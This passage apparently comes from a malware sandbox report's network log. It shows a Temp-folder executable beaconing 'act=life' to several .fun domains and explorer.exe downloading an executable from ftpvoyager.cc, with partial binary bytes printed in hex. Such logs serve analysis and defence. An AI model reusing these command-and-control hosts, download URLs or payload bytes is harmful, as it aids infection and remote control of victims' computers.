                                                                                                                                                                                                                                                                                                                                Referer: http://sbvtimrcbnumaj.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 281
                                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:55.713179111 CET599INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:55 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:55.728928089 CET282OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://ajtligjreiecnee.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 346
                                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:56.016267061 CET599INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:55 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                5192.168.2.449746104.21.13.14806064C:\Users\user\AppData\Local\Temp\B43A.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:41.735528946 CET272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                Host: bombertublestylebanws.fun
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:41.735560894 CET8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.276983976 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:42 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=p9npi09nk6ppskr7jn9e29065p; expires=Sun, 14-Apr-2024 21:49:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_show_country=1; expires=Mon, 19-Feb-2024 04:02:42 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_use_round=1; expires=Mon, 19-Feb-2024 04:02:42 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_round_n=2; expires=Mon, 19-Feb-2024 04:02:42 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kDLIIS2UvN8zI%2FHbVA%2BMsLiR5ZOIblo9%2FxLPqjCauibkY4S78d%2FGWsl%2FFm1TihQu4Elo5XwgYsUMKwK8xLhsPbtxgK72QUhkABgutt8Ty3i8jYQJRnYDEPslKUqk3QIimU%2BtDkCKy8a8ZGRt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY:
                                                                                                                                                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.276998997 CET39INData Raw: 38 33 38 64 33 62 32 33 32 62 34 36 62 33 62 66 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 838d3b232b46b3bf-MIAaerror #D12
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.277071953 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                6192.168.2.449748172.67.143.130806064C:\Users\user\AppData\Local\Temp\B43A.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.684705973 CET269OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                Host: neighborhoodfeelsa.fun
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.684736967 CET8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.250936985 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=qq1sdgt2k530gc6p3khp6jf487; expires=Sun, 14-Apr-2024 21:49:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_show_country=1; expires=Mon, 19-Feb-2024 04:02:43 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_use_round=1; expires=Mon, 19-Feb-2024 04:02:43 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_round_n=2; expires=Mon, 19-Feb-2024 04:02:43 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DJR7QQ80sMc56VPLvJNorNSTAO6a4f58qJ6DuMg5axVj4QbYjvFE%2Fw8FxUxFDo5Au4vSkpkhAQ7%2FZH6q4AcIblup8avTJ7Jrj2PotbCi4sybVB4qgZ3xvrlaPrNTrq1PNRECin4sc%2BDq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3b291
                                                                                                                                                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.250976086 CET29INData Raw: 30 38 34 63 30 39 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 084c09-MIAaerror #D12
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.251110077 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                7192.168.2.4497492.180.10.7802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.411250114 CET164OUTGET /ftp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Host: ftpvoyager.cc
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.995676041 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.24.0
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Description: File Transfer
                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=634389b1.exe
                                                                                                                                                                                                                                                                                                                                Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                Pragma: public
                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a5 b7 a8 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 16 02 00 00 e6 43 00 00 00 00 00 da 3c 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 45 00 00 04 00 00 b6 2b 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 5a 02 00 3c 00 00 00 00 80 44 00 18 6a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 4d 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 15 02 00 00 10 00 00 00 16 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 33 00 00 00 30 02 00 00 34 00 00 00 1a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 03 42 00 00 70 02 00 00 14 00 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 6a 01 00 00 80 44 00 00 6c 01 00 00 62 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELcC<0@E+XZ<Dj1M@0.text `.rdataB304@@.data|BpN@.rsrcjDlb@@
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.995723963 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 56 8d 45 08 50 8b f1 e8 60 28 00 00 c7 06 04 32 42
                                                                                                                                                                                                                                                                                                                                Data Ascii: UVEP`(2B^]2B)UVEtVt)^]UEQRUQRN)]UEQRUQRi']ffhLB
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.995774031 CET1286INData Raw: 8b 0d 7c 61 84 00 c1 e8 03 81 ec 1c 08 00 00 85 c0 0f 86 b1 00 00 00 53 8b 1d b0 30 42 00 56 8b 35 ac 30 42 00 57 8b 3d b4 30 42 00 89 4d fc 89 45 f8 8d 9b 00 00 00 00 81 3d 28 72 84 00 59 09 00 00 75 6a 6a 00 6a 00 6a 00 ff d6 6a 00 8d 85 e4 f7
                                                                                                                                                                                                                                                                                                                                Data Ascii: |aS0BV50BW=0BME=(rYujjjjjPjhPLBjjjjjhLBhLBjD0B3PPMQPEEEEEL0BjjjjjjjH0BURQEms_^[]UQEE%_E|a
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.995788097 CET1286INData Raw: cc cc 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc e9 9b f7 ff ff cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 8b f1 8b 06 8b 50 10 57 ff d2 89 45 fc e8 77 f7 ff ff 8b f8 8d 55 fc 8d 45 f8 89 7d f8 e8 57 f7 ff ff 84 c0 74 08 8b c7 5f
                                                                                                                                                                                                                                                                                                                                Data Ascii: 3UVPWEwUE}Wt_^]/_^]UU@RUjR]UVW}3MuS]Eh~2;}EVPEPSUu+u4M
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.995835066 CET424INData Raw: 00 00 83 4e 40 01 8b ce e8 7f 07 00 00 8b f0 8d 45 08 e8 65 f2 ff ff 5f 88 06 8b 45 08 5e 5b 8b e5 5d c2 04 00 cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 8b f1 57 8b c6 e8 4f 06 00 00 85 c0 0f 84 9b 00 00 00 8b c6 e8 40 06 00 00 8b f8 8b c6 e8 27
                                                                                                                                                                                                                                                                                                                                Data Ascii: N@Ee_E^[]UVWO@';JUE}*u'EEJEuF@uC%UE}uEEP_^]_^]
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.995914936 CET1286INData Raw: 5f 5e e9 fd f0 ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 53 56 8b f1 57 8b c6 e8 e1 04 00 00 85 c0 74 16 8b c6 e8 d6 04 00 00 39 46 3c 73 0a 8b c6 e8 ca 04 00 00 89 46 3c 8a 5d 14 f6 c3 01 0f 84 e9 00 00 00 8b c6 e8 94 04 00 00 85 c0
                                                                                                                                                                                                                                                                                                                                Data Ascii: _^USVWt9F<sF<]EumN<}+}8u!u ]D}+}t=1B}}V<+;+=E
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.995955944 CET1286INData Raw: 24 8b 01 c3 cc cc cc cc cc cc cc cc cc cc 8b 48 30 8b 50 20 8b 01 03 02 c3 cc cc cc cc cc 8b 42 30 29 08 8b 42 20 01 08 c3 cc cc cc cc cc 56 8b 71 10 89 3e 8b 71 20 89 16 8b 49 30 2b c2 89 01 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 48 34 8b
                                                                                                                                                                                                                                                                                                                                Data Ascii: $H0P B0)B Vq>q I0+^H4P$A0I PH 9tP03B4)B$Vrr$+J4^Vq>q$I4+^A4I$PH$9
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.996638060 CET106INData Raw: e8 83 42 00 8b f0 85 c0 75 7b 50 8d 4d f0 e8 c8 f7 ff ff a1 e8 83 42 00 21 75 fc 8b f0 85 c0 75 58 6a 34 e8 d5 04 00 00 59 8b c8 89 4d ec c6 45 fc 01 85 c9 74 0a 56 e8 10 ff ff ff 8b f0 eb 02 33 f6 56 c6 45 fc 00 e8 76 fe ff ff 8d 4e 18 c7 46 10
                                                                                                                                                                                                                                                                                                                                Data Ascii: Bu{PMB!uuXj4YMEtV3VEvNF?$l2B5B
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.996746063 CET1286INData Raw: cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 d0 24 42 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 08 53 8b 5d 0c 56 57 8b fb 89 65 f0 83 cf 07 e8 b2 ff ff ff 8b f0 3b f7 73 04 8b fb eb 20 8b 45 08 8b 58 18 b8 ab aa aa aa f7 e7 8b cb d1 e9 d1
                                                                                                                                                                                                                                                                                                                                Data Ascii: Ujh$BdPd%S]VWe;s EX;s+;w<OEE+EHeEEyEE'+@}uEvPEPOQUjR3\Epux[M_^d[]E
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.996758938 CET318INData Raw: e8 ad f4 ff ff 56 56 e8 21 0f 00 00 cc 6a 04 b8 63 23 42 00 e8 63 13 00 00 8b f1 89 75 f0 e8 ad 08 00 00 ff 75 08 83 65 fc 00 8d 4e 0c c7 06 10 32 42 00 e8 82 03 00 00 8b c6 e8 a6 13 00 00 c2 04 00 83 79 24 10 72 04 8b 41 10 c3 8d 41 10 c3 8b ff
                                                                                                                                                                                                                                                                                                                                Data Ascii: VV!jc#BcuueN2By$rAAVjjN2BK^?UVEtVY^]UVum2B^]2BUV2BEtVVY^]UVu(2
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.996803045 CET1286INData Raw: 00 8d 4d d8 e8 0c 01 00 00 83 65 fc 00 8d 45 d8 50 8d 4d b0 e8 39 ff ff ff 68 08 53 42 00 8d 45 b0 50 e8 c8 0d 00 00 cc 8b ff 55 8b ec 56 8b 75 08 83 fe fe 76 05 e8 b5 ff ff ff 39 71 18 73 0b ff 71 14 56 e8 a7 fd ff ff eb 28 80 7d 0c 00 74 18 83
                                                                                                                                                                                                                                                                                                                                Data Ascii: MeEPM9hSBEPUVuv9qsqV(}tsA;sPjuV3;^]UVW}Wt~rFFu+WV2:juht(NrFFuWQPu_^]


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                8192.168.2.449750104.21.18.224806064C:\Users\user\AppData\Local\Temp\B43A.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.639666080 CET272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                Host: diagramfiremonkeyowwa.fun
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.639666080 CET8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.778276920 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2%2FVm6WF1ZGrOblg5rLVo306TyBaL9fzxDBdmtr3kIDxENOh9b3cP1%2BGDHaqoyAAI9Av4BoJpmZ7tQrWDvPieJtX%2BIJlRrBtn0Y3BDUchyj4kpRCIHAsn1qL3KJgEQq4uleVncjXoBia6gpvu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3b2f1f0d0975-MIA
